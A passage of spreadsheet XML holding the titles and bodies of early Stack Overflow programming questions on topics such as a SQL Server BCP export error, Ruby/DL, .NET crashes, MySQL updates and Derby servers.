&lt;p&gt;What I would like to do in my application is to get a directory listing of the files/subdirectories in a directory. It's not really any different from uploading a file chosen by the user to list the contents of a directory chosen by the user so I don't see any security implications. I don't need to access the files, just list them,&lt;/p&gt;
&lt;p&gt;But there appears to be no way in flash to do this?
Am I right or am I missing something?&lt;/p&gt;
&lt;p&gt;I can always use a signed java applet instead if necessary but flash seems more appropriate for my particular application so I thought it worth asking the question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where do you get XML file formats from</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Looking at questions like &lt;a href="http://stackoverflow.com/questions/77726/xml-or-sqlite-when-to-drop-xml-for-a-database"&gt;http://stackoverflow.com/questions/77726/xml-or-sqlite-when-to-drop-xml-for-a-database&lt;/a&gt; and &lt;a href="http://stackoverflow.com/questions/44207/what-are-good-alternative-data-formats-to-xml"&gt;http://stackoverflow.com/questions/44207/what-are-good-alternative-data-formats-to-xml&lt;/a&gt; it is clear that XML is something you best use for exchanging data between systems, organizations, and software programs.  For internal use, other formats tend to more compact and scalable, like home-made plain-text formats, regular source code, or using a database. &lt;/p&gt;
&lt;p&gt;Once the time comes to move data out to some other program/tool/system/organization in XML: where and how do you define the data format encapsulated in the XML file?  It is clear that you need strict rules for what goes where, and then meaning of all nodes in the tree.  XML is not self-documenting, that much seems clear.  &lt;/p&gt;
&lt;p&gt;Do you use somebody else's design, or roll your own? Is there some good guide to how to do the document designs?&lt;/p&gt;
&lt;p&gt;/jakob&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Engineer accountability and code review processes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In your â€œenterpriseâ€ work environment, how are engineers held accountable for performing code inspections and unit testing?  What processes do you follow (formal methodology or custom process) to ensure the quality of your software?  Do you or have you tried implementing a developer "signoff" sheet for deliverables?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
&lt;p&gt;Update:  I forgot to mention we are using Code Collaborator to perform our inspections.  The problem is getting people to "get it" and buy into doing them outside of a core group of people.  As stalbot pointed out below it is a cultural change but the question becomes, how do you change your culture to promote quality initiatives such as reviews/unit tests?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BCP out Error in SQL2000: SQLState = 37000, NativeError = 4060</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a proc that grabs all the user tables in a local DB on my machine. I want to be able to create a flat file of all my tables using BCP and SQL. Its a dummy database in SQL 2000 connecting through windows authentication. I have set my enviroment path variable in WinXP SP2. I have created new users to access the db, switched off my firewall, using trusted connection. I have tried dozens of forums, no luck. &lt;/p&gt;
&lt;p&gt;In dos command prompt I get the same error. &lt;/p&gt;
&lt;p&gt;SQLState = 37000, NativeError = 4060
Error = [Microsoft][ODBC SQL Server Driver][SQL Server]Cannot open database requested in login '[HelpDesk-EasyPay'. Login fails.&lt;/p&gt;
&lt;p&gt;Here is my SP: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Path VARCHAR(100),
    @UserName VARCHAR(15),
    @PassWord VARCHAR(15),
    @ServerName VARCHAR(15)
AS 
set quoted_identifier off
set nocount on
declare @n int
declare @db varchar(40)
set @db=DB_NAME()
declare @TableName varchar(15) 
declare @bcp varchar(200)
select identity(int,1,1) as tblNo,name tblname into #T from Sysobjects where xtype='u'
select @n=COUNT(*) from #T
WHILE (@n&amp;gt;0)
BEGIN
    SELECT @TableName=tblname FROM #T WHERE tblno=@n
    PRINT 'Now BCP out for table: ' + @TableName
    SET @bcp = "master..xp_cmdshell 'BCP " + "[" + @db + ".." + @TableName + "]" + " OUT" + @Path + "" + @TableName+".txt -c -U" + @UserName + " -P" + @PassWord + " -S" + @ServerName + " -T" + "'" 
    EXEC(@bcp)
    SET @n=@n-1
END
DROP TABLE #T
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone advise. This seems to be a connection problem or BCP ? Not sure. &lt;/p&gt;
&lt;p&gt;edit: I am running this from query analyzer because I have 118 tables to output to flat file. I seem to agree that its an authentication issue because I tried connecting to master db with username sa password root. which is what its set to and I get the same error: SQLState = 37000, NativeError = 4060&lt;/p&gt;
&lt;p&gt;Thanking you in advance. 
EJ&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine which Child Page is being displayed from Master Page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing code on the master page, and I need to know which child (content) page is being displayed.  How can I do this programmatically? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Python library function which attempts to guess the character-encoding of some bytes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing some mail-processing software in Python that is encountering strange bytes in header fields.  I suspect this is just malformed mail; the message itself claims to be us-ascii, so I don't think there is a true encoding, but I'd like to get out a unicode string approximating the original one without throwing a &lt;code&gt;UnicodeDecodeError &lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So, I'm looking for a function that takes a &lt;code&gt;str&lt;/code&gt; and optionally some hints and does its darndest to give me back a &lt;code&gt;unicode&lt;/code&gt;.  I could write one of course, but if such a function exists its author has probably thought a bit deeper about the best way to go about this.&lt;/p&gt;
&lt;p&gt;I also know that Python's design prefers explicit to implicit and that the standard library is designed to avoid implicit magic in decoding text. I just want to explicitly say "go ahead and guess".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you use Ruby/DL? Is this right?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write an interface between RSPEC (ruby flavoured BDD) and a Windows application.  The application itself is written in an obscure language, but it has a C API to provide access.  I've gone with Ruby/DL but am having difficulties getting even the most basic call to a DLL method to work.  Here is what I have so far, in a file called gt4r.rb:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require 'dl/import'
module Gt4r
  extend DL::Importable
  dlload 'c:\\gtdev\\r321\\bin\\gtvapi'
  # GTD initialization/termination functions
  extern 'int GTD_init(char *[], char *, char *)'
  extern 'int GTD_initialize(char *, char *, char *)'
  extern 'int GTD_done(void)'
  extern 'int GTD_get_error_message(int, char **)'
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My reading so far suggests that this is all I need to get going, so I wrote up a RSPEC example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require 'gt4r'
@@test_environment = "INCLUDE=C:\\graphtalk\\env\\aiadev\\config\\aiadev.ini"
@@normal_user = "BMCHARGUE"
describe Gt4r do
  it 'initializes' do
      rv = Gt4r.gTD_initialize @@normal_user, @@normal_user, @@test_environment
      rv.should == 0
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And when run...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\code\GraphTalk&amp;gt;spec -fs -rgt4r gt4r_spec.rb
Gt4r
- initializes (FAILED - 1)
1)
'Gt4r initializes' FAILED
expected: 0,
     got: 13 (using ==)
./gt4r_spec.rb:9:
Finished in 0.031 seconds
1 example, 1 failure
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The return value (13) is an actual return code, meaning an error, but when I try to add the gTD_get_error_message call to my RSPEC, I can't get the parameters to work.&lt;/p&gt;
&lt;p&gt;Am I heading in the right direction and can anyone point to the next thing I can try?&lt;/p&gt;
&lt;p&gt;Thanks,
Brett&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;A follow up to this question, showing the part that fails when I try to get the error message from my target library:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require 'gt4r'
@@test_environment = "INCLUDE=C:\\graphtalk\\env\\aiadev\\config\\aiadev.ini"
@@normal_user = "BMCHARGUE"
describe Gt4r do
  it 'initializes' do
      rv = Gt4r.gTD_initialize @@normal_user, @@normal_user, @@test_environment
      Gt4r.gTD_get_error_message rv, @msg
      @msg.should == ""
      rv.should == 0
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I expect the error message to be returned in @msg, but when run I get the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Gt4r
(eval):5: [BUG] Segmentation fault
ruby 1.8.6 (2008-08-11) [i386-mswin32]
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this if I use a symbol (:msg) instead:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\code\GraphTalk\gt4r_dl&amp;gt;spec -fs -rgt4r gt4r_spec.rb
Gt4r
- initializes (ERROR - 1)
1)
NoMethodError in 'Gt4r initializes'
undefined method `to_ptr' for :msg:Symbol
(eval):5:in `call'
(eval):5:in `gTD_get_error_message'
./gt4r_spec.rb:9:
Finished in 0.046 seconds
1 example, 1 failure
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Clearly I am missing something about passing parameters between ruby and C, but what?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Runtime 2.0 Error in a service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a custom service that writes to a DB (SQL 2005).  This is a full 64-bit environment (DB, .NET service).  On one of our servers we crash every morning when we have a spike in our volume of data.  On another server we run fine.  The only differences that I've been able to notice between the two machines is that the one experiencing the crash has .NET 3.5 also installed.&lt;/p&gt;
&lt;p&gt;Has anyone else seen this type of behavior?&lt;/p&gt;
&lt;p&gt;Here is the event log entry from the crash today:&lt;/p&gt;
&lt;p&gt;Event Type: Error&lt;br /&gt;
Event Source:   .NET Runtime 2.0 Error Reporting&lt;br /&gt;
Event Category: None&lt;br /&gt;
Event ID:   1000&lt;br /&gt;
Date:   	11/6/2008&lt;br /&gt;
Time:   	09:35:03&lt;br /&gt;
User:   	N/A&lt;br /&gt;
Computer:   RDDARWIN02&lt;br /&gt;
Description:&lt;br /&gt;
Faulting application servicehost.exe, version 2.0.6.6, stamp 48eb7b7a, faulting module  kernel32.dll, version 5.2.3790.4062, stamp 462643a7, debug? 0, fault address  0x0000000000027d8d.  &lt;/p&gt;
&lt;p&gt;For more information, see Help and Support Center at &lt;a href="http://go.microsoft.com/fwlink" rel="nofollow"&gt;http://go.microsoft.com/fwlink&lt;/a&gt;  /events.asp.&lt;br /&gt;
Data:&lt;br /&gt;
0000: 41 00 70 00 70 00 6c 00   A.p.p.l.&lt;br /&gt;
0008: 69 00 63 00 61 00 74 00   i.c.a.t.&lt;br /&gt;
0010: 69 00 6f 00 6e 00 20 00   i.o.n. .&lt;br /&gt;
0018: 46 00 61 00 69 00 6c 00   F.a.i.l.&lt;br /&gt;
0020: 75 00 72 00 65 00 20 00   u.r.e. .&lt;br /&gt;
0028: 20 00 73 00 65 00 72 00    .s.e.r.&lt;br /&gt;
0030: 76 00 69 00 63 00 65 00   v.i.c.e.&lt;br /&gt;
0038: 68 00 6f 00 73 00 74 00   h.o.s.t.&lt;br /&gt;
0040: 2e 00 65 00 78 00 65 00   ..e.x.e.&lt;br /&gt;
0048: 20 00 32 00 2e 00 30 00    .2...0.&lt;br /&gt;
0050: 2e 00 36 00 2e 00 36 00   ..6...6.&lt;br /&gt;
0058: 20 00 34 00 38 00 65 00    .4.8.e.&lt;br /&gt;
0060: 62 00 37 00 62 00 37 00   b.7.b.7.&lt;br /&gt;
0068: 61 00 20 00 69 00 6e 00   a. .i.n.&lt;br /&gt;
0070: 20 00 6b 00 65 00 72 00    .k.e.r.&lt;br /&gt;
0078: 6e 00 65 00 6c 00 33 00   n.e.l.3.&lt;br /&gt;
0080: 32 00 2e 00 64 00 6c 00   2...d.l.&lt;br /&gt;
0088: 6c 00 20 00 35 00 2e 00   l. .5...&lt;br /&gt;
0090: 32 00 2e 00 33 00 37 00   2...3.7.&lt;br /&gt;
0098: 39 00 30 00 2e 00 34 00   9.0...4.&lt;br /&gt;
00a0: 30 00 36 00 32 00 20 00   0.6.2. .&lt;br /&gt;
00a8: 34 00 36 00 32 00 36 00   4.6.2.6.&lt;br /&gt;
00b0: 34 00 33 00 61 00 37 00   4.3.a.7.&lt;br /&gt;
00b8: 20 00 66 00 44 00 65 00    .f.D.e.&lt;br /&gt;
00c0: 62 00 75 00 67 00 20 00   b.u.g. .&lt;br /&gt;
00c8: 30 00 20 00 61 00 74 00   0. .a.t.&lt;br /&gt;
00d0: 20 00 6f 00 66 00 66 00    .o.f.f.&lt;br /&gt;
00d8: 73 00 65 00 74 00 20 00   s.e.t. .&lt;br /&gt;
00e0: 30 00 30 00 30 00 30 00   0.0.0.0.&lt;br /&gt;
00e8: 30 00 30 00 30 00 30 00   0.0.0.0.&lt;br /&gt;
00f0: 30 00 30 00 30 00 32 00   0.0.0.2.&lt;br /&gt;
00f8: 37 00 64 00 38 00 64 00   7.d.8.d.&lt;br /&gt;
0100: 0d 00 0a 00               ....      &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access savedThis property in Function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I'm in the flash debugger, and I have some callbacks saved, I can see that the functions have a property named &lt;code&gt;savedThis&lt;/code&gt; that is very usefull to know where that callback came from.&lt;/p&gt;
&lt;p&gt;I'm trying to access that property from code, but for some reason I can't.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;callback.savedThis&lt;/code&gt; throws an Error because it can't find the property, probable because it's private.&lt;/p&gt;
&lt;p&gt;So I tried to add a method to the Function class that would give me access to it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Function.prototype.getSavedThis = function()
{
	return this.savedThis
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it gives me the same error about not finding the property, even though I can see it in the debugger.
Is there a way to access it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: I'm not planing on using this in production code, I'm making some classes to help me with debugging by automating some data gathering, and it would be incredible useful to get this information without having to add code to every callback saved informing of the this object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Understanding JDBC internals</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;[1] In JDBC, why should we first load drivers using Class.forName("some driver name").
Why SUN didnt take care of loading driver within the getConnection() method itself.If I pass driver name as a parameter to the getConnection() method. &lt;/p&gt;
&lt;p&gt;[2] I want to understand JBDC internals.Any pointers towards it are appreciated. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Opening an application inside a form - C# or VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing an application and I would like to be able to display another application inside it.  (Think like a windows form with a small box, or a tab that is displaying a totally seperate application.)&lt;/p&gt;
&lt;p&gt;Is that something that can be done? If so, can anyone give some direction on how to go about doing it? &lt;/p&gt;
&lt;p&gt;I am looking for something in the C# or VB.NET world.&lt;/p&gt;
&lt;p&gt;THANKS! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Net Data Handling Suggestions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am just beginning to write an application. Part of what it needs to do is to run queries on a database of nutritional information. What I have is the USDA's &lt;a href="http://www.ars.usda.gov/Services/docs.htm?docid=17478" rel="nofollow"&gt;SR21 Datasets&lt;/a&gt; in the form of flat delimited ASCII files.&lt;/p&gt;
&lt;p&gt;What I need is advice. I am looking for the best way to import this data into the app and have it easily and quickly queryable at run time. I'll be using it for all the standard things. Populating controls dynamically, Datagrids, calculations, etc. I will also need to do user specific persistent data storage as well. This will not be a commercial app, so hopefully that opens up the possibilities. I am fine with .Net Framework 3.5 so Linq is a possibility when accessing the data (just don't know if it would be the best solution or not). So, what are some suggestions for persistent storage in this scenario? What sort of gotchas should I be watching for? Links to examples are always appreciated of course. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to validate .NET dialog items when using automatic DialogResult?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At the moment I have setup a custom ok cancel dialog with a drop down in c#. The ok and cancel buttons use the DialogResult property so no code behind it. What I now need to do is validate the drop down to check it isn't left empty before posting back a dialogresult.&lt;/p&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Fix This MySQL Query So It Works?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UPDATE lessonstatus
INNER JOIN user ON lessonstatus.user_id = user.user_id
SET user_id = (SELECT user_id FROM user WHERE username = 'too_many_accounts')
WHERE last_name = 'stupid' 
AND first_name = 'user'
AND username != 'too_many_accounts'
AND lessonstatus.lesson_id NOT IN (SELECT lesson_id FROM lessonstatus WHERE user_id = 1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I get the following error when trying to execute it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error Code : 1093
You can't specify target table 'lessonstatus_rtab' for update in FROM clause
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would I fix this query so that it works?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Emacs and cygwin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I change my GNUemacs to open up a cygwin terminal rather then a cmd one with the shell command?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Closed&lt;/strong&gt; as duplicate of  &lt;a href="http://stackoverflow.com/questions/235254/how-can-i-run-cygwin-bash-shell-from-within-emacs"&gt;How can I run Cygwin Bash Shell from within Emacs?&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Does OCaml have general map()/reduce() functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Python map() works on any data that follows the sequence protocol.  It does The Right Thing^TM whether I feed it a string or a list or even a tuple.&lt;/p&gt;
&lt;p&gt;Can't I have my cake in OCaml too?  Do I really have no other choice but to look at the collection type I'm using and find a corresponding List.map or an Array.map or a Buffer.map or a String.map?  Some of these don't even exist!  Is what I'm asking for unusual?  I must be missing something.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scope of Oracle transactions when used from ADO.NET and involving triggers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am told by someone that when calling Oracle from ADO.net, when calling multiple inserts in a loop, where each insert causes a trigger to fire that includes within it's PL-Sql a Commit statement, that it is impossible to stop that commit from actually commiting the transaction.&lt;/p&gt;
&lt;p&gt;i.e., I want my ADO.Net code to begin a transaction before the loop starts, and, when the loop exits, only commit all the inserts if and only if every insert in the loop was successful.  My source is telling me that the way Oracle works, if these triggers include COmmit statements, then this is impossible.. &lt;/p&gt;
&lt;p&gt;As this seems to be an very common requirement, and I know it is possible in SQL Server, this does not seem right to me.  &lt;/p&gt;
&lt;p&gt;Is this correct?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScript: Ci is not defined</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just spent half an one our to find out what caused the Error-Message "Ci is not defined" in my JavaScript code. I finally found the reason:&lt;/p&gt;
&lt;p&gt;It should be (jQuery):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("asd").bla();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It was:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;("asd").bla();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(Dollar sign gone missing)&lt;/p&gt;
&lt;p&gt;Now after having fixed the problem I'd like to understand the message itself: What does Firefox mean when it tells me that "Ci" is not defined. What's "Ci"?&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;Update:
I'm using the current version of Firefox (3.0.3).&lt;/p&gt;
&lt;p&gt;To reproduce, just use this HTML code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;test&amp;lt;/title&amp;gt;
&amp;lt;script&amp;gt;
("asd").bla();
&amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To make it clear: I know what caused the error message. I'd just like to know what Firefox tries to tell me with "Ci"...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Iterate through generic list of unknown type at runtime in VB.Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to iterate over a generic list if the type of that list isn't known until runtime?&lt;/p&gt;
&lt;p&gt;For example, assume &lt;code&gt;obj1&lt;/code&gt; is passed into a function as an &lt;code&gt;Object&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim t As Type = obj1.GetType
If t.IsGenericType Then
    Dim typeParameters() As Type = t.GetGenericArguments()
    Dim typeParam As Type = typeParameters(0)
End If
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If &lt;code&gt;obj&lt;/code&gt; is passed as a &lt;code&gt;List(Of String)&lt;/code&gt; then using the above I can determine that a generic list (&lt;code&gt;t&lt;/code&gt;) was passed and that it's of type &lt;code&gt;String&lt;/code&gt; (&lt;code&gt;typeParam&lt;/code&gt;). I know I am making a big assumption that there is only one generic parameter, but that's fine for this simple example.&lt;/p&gt;
&lt;p&gt;What I'd like to know is, based on the above, how do I do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;For Each item As typeParam In obj1
    'do something with it here
Next
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or even something as simple as getting &lt;code&gt;obj1.Count()&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Kill Derby DB Network Server on background</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a good way to run a Apache Derby server in network mode. I'm using the NetworkServerControl to start the server and it's working great.&lt;/p&gt;
&lt;p&gt;I start the server like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * starts the network server
 * @return true if sucessfull
 */
public boolean start()
{
    try
    {
        // just to be sure that we don't start two servers
        this.stop();
        server = new NetworkServerControl();
        server.start( null );
        return true;
    }
    catch ( Exception ex )
    {
        this.logLogger.debug( ex );
        return false;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And stop it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * stops the server
 * 
 * @return true if there were no problems stopping the server
 */
public boolean stop()
{
    try
    {
        if ( server == null )
        {
            server = new NetworkServerControl();
        }
        server.shutdown();
        return true;
    }
    catch ( Exception ex )
    {
        this.logLogger.debug( ex );
        return false;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the main() I have this so the process doesn't die while the server is running&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(...)
clsDB.start();
while( clsDB.testForConnection() )
{
   Thread.sleep( 60000 );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;testForConnection() looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * Try to test for a connection
 * 
 * @return true if the server is alive
 */
public boolean testForConnection()
{
    try
    {
        server.ping();
        return true;
    }
    catch ( Exception ex )
    {
        this.logLogger.debug( ex );
        return false;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My problem is that when a new instace of my JAR is called the old one will still be running (unless I'm really really lucky and the test is made before the new server is started).&lt;/p&gt;
&lt;p&gt;I know I could just test if the server is already running and then I wouldn't start again, but I would like for start to work like a restart if the server is already there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tests Projects In Solution</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET should you place unit test projects in with the rest of the solution? Or should there be a test solution that houses all the test projects?&lt;/p&gt;
&lt;p&gt;We have all the test projects in with our code base solution...it seems a bit cumbersome. &lt;/p&gt;
&lt;p&gt;What do you usually do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to change headers on an S3 object without downloading the entire object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've uploaded a bunch of images to Amazon S3, and now want to add a Cache-Control header to them. &lt;/p&gt;
&lt;p&gt;Can the header be updated without downloading the entire image? If so, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SetSecurityDescriptorSddlForm(string sddlForm)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I dont find any usefull website according to this API.&lt;/p&gt;
&lt;p&gt;What's the format of the String? The content?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between a LinkedList and a Binary Search Tree</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the main differences between a Linked List and a BinarySearchTree? Is BST just a way of maintaining a LinkedList? My instructor talked about LinkedList and then BST but did't compare them or didn't say when to prefer one over another. This is probably a dumb question but I'm really confused. I would appreciate if someone can clarify this in a simple manner.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding Unique Table/Column Combinations Across SQL Databases</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 4 databases with similar schema's, and I'm trying to create a query to return just the table, column pairs that exist ONLY in database 1 and do not exist in database 2, 3, or 4.&lt;/p&gt;
&lt;p&gt;Currently I can return the symmetric difference between database 1 and 2 via the following query...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select table_name, column_name from (
    	select table_name, column_name from [Database1].information_schema.columns
    	union all
    	select table_name, column_name from [Database2].information_schema.columns) as tmp
    	group by table_name, column_name having count(*) = 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, in trying to isolate just those columns in database 1, and doing the same across all 4 databases, things are getting complicated. What is the cleanest solution for this query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;%# Eval("State") %&gt; or &lt;%# DataBinder.Eval(Container.DataItem, "state")%&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between having&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;&amp;lt;%# Eval("State") %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in your &lt;code&gt;aspx&lt;/code&gt; page, versus having&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;&amp;lt;%# DataBinder.Eval(Container.DataItem, "State") %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in your &lt;code&gt;aspx&lt;/code&gt; page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help getting QTP to identify a control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're trying to use QTP (QuickTest Professional) to auto-test a legacy C++ application.&lt;/p&gt;
&lt;p&gt;However, the main window for the app is composed of several IDENTICAL panels.  Each panel has a unique title.&lt;/p&gt;
&lt;p&gt;If I view the window in Spy++ (comes with DevStudio), I see:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+ Window &amp;lt;hwnd&amp;gt; "Window Title" taskwindowclass
  + Window &amp;lt;hwnd&amp;gt; "Panel A" childwindowclass
    + Window &amp;lt;hwnd&amp;gt; "OK" Button
  + Window &amp;lt;hwnd&amp;gt; "Panel B" childwindowclass
    + Window &amp;lt;hwnd&amp;gt; "OK" Button
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In QTP's Object Spy however, the hierarchy shows as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+ Window: Window Title
  + WinButton: OK
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It doesn't even show that there is an intermediate panel.&lt;/p&gt;
&lt;p&gt;Does anybody know a way to get the window "path" in order to identify each control?
i.e. so the controls identify as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Button A: "Window Title/Panel A/OK"
Button B: "Window Title/Panel B/OK"
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there some list of input's IDs or names of Form after the script was sent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's imagine I got this:&lt;/p&gt;
&lt;p&gt;index.php generates form with unpredictable number of inputs with certain IDs/Names and different values that can be edited by user and saved by script.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form action="script.php" method="post"&amp;gt;
&amp;lt;input id="1" name="1" type="text" value="1"/&amp;gt;
&amp;lt;input id="24" name="24" type="text" value="2233"/&amp;gt;
&amp;lt;input id="55" name="55" type="text" value="231321"/&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Script.php:&lt;/p&gt;
&lt;p&gt;Here I need to get something like array of all inputs that were generated by index.php and save every value that corresponds to its id/name.&lt;/p&gt;
&lt;p&gt;Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lambda Expressions in Delphi Prism/Oxygene</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been experimenting with Lambda expressions in Oxygene. Very simple recursive lambda expression to calculate a fibonacci number :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var fib : Func&amp;lt;int32, int32&amp;gt;;
fib := n -&amp;gt; iif(n &amp;gt; 1, fib(n - 1) + fib(n - 2), n);
fib(3);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run this code I get a nullreferenceexception. Any ideas as to what I'm doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jquery round corners</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This probably sounds really stupid but I have noo idea how to implement jquery's rounded corners (&lt;a href="http://www.methvin.com/jquery/jq-corner-demo.html" rel="nofollow"&gt;http://www.methvin.com/jquery/jq-corner-demo.html&lt;/a&gt;). My javascript-fu is complete fail and I can't seem to get it to work on my page. Can anyone show me a simple example of the HTML and JavaScript you would use to get them to show? Apologies for my idiocy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Deletion Cascading Help (Specific Question)</t>
  </si>
  <si>
